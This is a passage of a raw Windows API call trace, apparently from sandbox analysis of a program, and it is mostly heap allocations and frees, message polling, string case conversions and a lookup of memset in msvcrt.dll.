Flags=0x0, Size=0x10) returned 0x9ba570 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0162.393] CharLowerBuffW (in: lpsz="byte[78166]", cchLength=0xb | out: lpsz="byte[78166]") returned 0xb [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x24) returned 0x8dc1c8 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0162.393] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0162.394] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0162.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.394] CharUpperBuffW (in: lpsz="MEMSET", cchLength=0x6 | out: lpsz="MEMSET") returned 0x6 [0162.394] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0162.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0162.394] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1aa0 [0162.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd6f0 [0162.395] CharLowerBuffW (in: lpsz="ptr:cdecl", cchLength=0x9 | out: lpsz="ptr:cdecl") returned 0x9 [0162.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.395] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x75c90000 [0162.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0162.395] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x7) returned 0x9c2628 [0162.395] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="memset", cchWideChar=7, lpMultiByteStr=0x9c2628, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="memset", lpUsedDefaultChar=0x0) returned 7 [0162.395] FreeLibrary (hLibModule=0x75c90000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deba0 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dec68 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4c8 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9a8 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0162.395] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4f8 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba4e0 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.396] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0162.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.396] PeekMessageW (in: lpMsg=0x87f114, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f114) returned 0 [0162.396] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0162.396] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db180 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd738 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba420 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8defb0 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd498 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df208 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df0c8 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba168 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0162.397] PeekMessageW (in: lpMsg=0x87f36c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f36c) returned 0 [0162.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b30 [0162.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0162.397] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x30) returned 0x9bf310 [0162.397] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILE", cchLength=0x12 | out: lpsz="_WINAPI_CREATEFILE") returned 0x12 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bf310 | out: hHeap=0x8a0000) returned 1 [0162.397] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee70 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e19f0 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df0c8 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4b0 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba168 [0162.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1af0 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b70 [0162.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1b70 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd870 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1900 [0162.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd498 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df208 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0162.398] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8defb0 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0162.398] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba420 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df1e0 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0162.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba330 | out: hHeap=0x8a0000) returned 1 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec68 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba330 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deba0 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fe8 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1aa0 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd738 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0162.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee48 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd768 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0162.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8df078 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0162.399] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0162.399] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a20 [0162.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dedf8 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0162.400] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dec18 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd990 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db180 [0162.400] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8debc8 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd540 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0162.400] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2658 [0162.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0162.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2658 | out: hHeap=0x8a0000) returned 1 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dee20 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2628 [0162.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0162.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def10 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2628 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba288 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0162.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3d8 | out: hHeap=0x8a0000) returned 1 [0162.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8deee8 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3d8 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2788 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.401] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.401] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.402] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda20 [0162.402] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.402] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0162.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0162.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c28a8 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d420 [0162.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d420 | out: hHeap=0x8a0000) returned 1 [0162.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28a8 | out: hHeap=0x8a0000) returned 1 [0162.403] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2618 | out: hHeap=0x8a0000) returned 1 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8def88 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bda20 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd4f8 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba408 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9f0 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd9a8 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4c8 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd6f0 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9b9e38 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0162.403] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd888 